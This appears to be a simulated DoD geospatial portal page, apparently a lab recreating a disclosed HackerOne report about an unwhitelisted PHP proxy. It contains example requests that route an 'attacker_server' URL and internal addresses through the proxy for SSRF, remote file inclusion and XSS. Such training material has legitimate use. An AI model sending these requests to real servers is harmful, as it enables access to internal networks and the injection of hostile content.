U.S. Department of Defense — Geospatial Intelligence Services — National Geospatial-Intelligence Agency — Authorized Use Only
U.S. Department of Defense · National Geospatial-Intelligence Agency
GEOINT Data Portal
ArcGIS Enterprise 10.9.1 — Geospatial Intelligence Services
UNCLASSIFIED // FOUO
analyst_user
Map View Layers Proxy Services
Analysis
Contents 5 layers
Operational Layers
countryBoundaryLayer WMS
Service: wms.geoint.mil/boundary
militaryBaseLayer WMS
terrainElevation WFS
populationDensity WMS
coastlineFeatures WFS
Basemap
Light Gray Canvas Base
WMS Services
NGA Primary Services
wms.geoint.mil/boundary
wms.geoint.mil/terrain
Proxy Endpoint
/proxys/plain.php
⚠ No URL whitelist enforced
Lat 38.8977° N  |  Lon 77.0365° W | Zoom 3 | EPSG:4326
CANADA UNITED STATES BRAZIL AFRICA RUSSIA CHINA AUSTRALIA ● Washington DC ● London ● Moscow ● Beijing
Legend
countryBoundaryLayer
Military Installations
Terrain Elevation
Population Density
Coastline Features
2,500 km
Esri, NGA, DoD | Sources: NGA, USGS
5 layers active | Map: Light Gray Canvas (EPSG:4326) | Proxy: /proxys/plain.php ⚠ plain.php allows unrestricted URL fetch
plain.php — WMS Proxy Service GET /proxys/plain.php HackerOne #192940
// Normal WMS service request — fetches layer metadata https://████.mil/████/proxys/plain.php?url=http://wms.geoint.mil/boundary/ows&operation=GetParameterInfo&parameter=countryBoundaryLayer&outputFormat=JSON // No IP/domain whitelist — fetches ANY url including attacker-controlled hosts https://████.mil/████/proxys/plain.php?url=http://attacker_server/t.html&operation=GetParameterInfo&parameter=countryBoundaryLayer&outputFormat=JSON
operation
parameter
outputFormat
The url parameter is fetched server-side with no whitelist. Try: http://127.0.0.1/1002.php?internal=secret for SSRF, or any attacker-controlled domain for RFI. 

            
          

        


      

    


  


  
  


    

      
Service Info

      

        
Host████.mil

        
ServerApache/2.4 PHP 5.6

        
Script/proxys/plain.php

        
AuthNone (unauthenticated)

        
WhitelistNot configured

        
ReportedDec 21, 2016

        
ResolvedMar 20, 2018

      

    


    

      
Attack Vectors

      

        

          

          
Remote File Inclusion
Fetch attacker-controlled HTML/PHP via url=

        

        

          

          
XSS via Rendered Content
Remote HTML with <script> fires on DoD domain

        

        

          

          
SSRF — Internal Access
Proxy reaches internal resources invisible from outside

        

      

    


    

      
SSRF — Internal Network

      

        
Click to probe via proxy:

                

          
          http://127.0.0.1/        

                

          
          http://localhost/        

                

          
          http://10.10.2.15/        

                

          
          http://10.10.2.1/        

                

          
          http://192.168.1.1/        

              

    


    

      
WMS Operations

      

        
GetCapabilitiesGET

        
GetMapGET

        
GetFeatureInfoGET

        
GetParameterInfoGET